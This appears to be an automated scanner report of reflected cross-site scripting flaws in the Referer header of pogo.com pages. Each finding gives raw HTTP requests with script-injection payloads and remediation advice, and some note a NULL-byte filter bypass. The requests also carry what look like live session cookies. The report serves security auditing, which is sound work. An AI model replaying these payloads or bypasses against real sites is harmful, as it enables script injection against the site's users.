GET /hotdeploy/us/promotions/swf/sidenav/club-promo/CLP_holidayPD_lftNav_alt2 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=a0766</script><script>alert(1)</script>1623b3caefc
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5da67</script><script>alert(1)</script>55025bf1a96 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /img/prize/en_US/cash-giveaway HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=5da67</script><script>alert(1)</script>55025bf1a96
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7abe6</script><script>alert(1)</script>b7c1c6fe8e2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /login/entry.jsp?site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Ffbconnect%2Fjs.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=7abe6</script><script>alert(1)</script>b7c1c6fe8e2 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=DBFBE7E5DB27E8444071339BA4CA19A0.000195; com.pogo.unid=6606578824406775
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61995</script><script>alert(1)</script>fedd47ab6a7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /login/pogo/setCookie.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=61995</script><script>alert(1)</script>fedd47ab6a7 Cache-Control: max-age=0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: com.pogo.site=pogo; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536377459-New%7C1297128377459%3B; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a239f</script><script>alert(1)</script>d5873489ea2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /login/word-verification.jsp HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=a239f</script><script>alert(1)</script>d5873489ea2 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: com.pogo.site=pogo; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_pers=%20s_nr%3D1294536335943-New%7C1297128335943%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb7e2</script><script>alert(1)</script>a2f2ba94e0d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/us/latestnews/news-2010.jsp HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=bb7e2</script><script>alert(1)</script>a2f2ba94e0d
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83883</script>fce9da87ffa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/us/netiquette/net-2009.jsp HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=83883</script>fce9da87ffa
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89060</script><script>alert(1)</script>e8717c673a3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/us/winnerscircle/winners-2010.jsp?pageSection=free_home_news#top HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=89060</script><script>alert(1)</script>e8717c673a3
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 984d2</script>6545c68478a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /prize/prize.do HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: 984d2</script>6545c68478a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93d27</script><script>alert(1)</script>4687fc424ef was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /prize/prize.do?pageSection=header_prizes HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=93d27</script><script>alert(1)</script>4687fc424ef Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_cc=true; s_sq=%5B%5BB%5D%5D
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf0b3</script><script>alert(1)</script>08734cd08f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /prize/rules.do HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: cf0b3</script><script>alert(1)</script>08734cd08f
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %006a5b9</script><a>ed740adce0b was submitted in the Referer HTTP header. This input was echoed as 6a5b9</script><a>ed740adce0b in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /profiles/k7240 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=%006a5b9</script><a>ed740adce0b
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38e38</script><script>alert(1)</script>9e879b8cc05 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /puzzle-games?pageSection=categorybar_puzzle HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: 38e38</script><script>alert(1)</script>9e879b8cc05
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0087a19</script>8fdc2d67036 was submitted in the Referer HTTP header. This input was echoed as 87a19</script>8fdc2d67036 in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
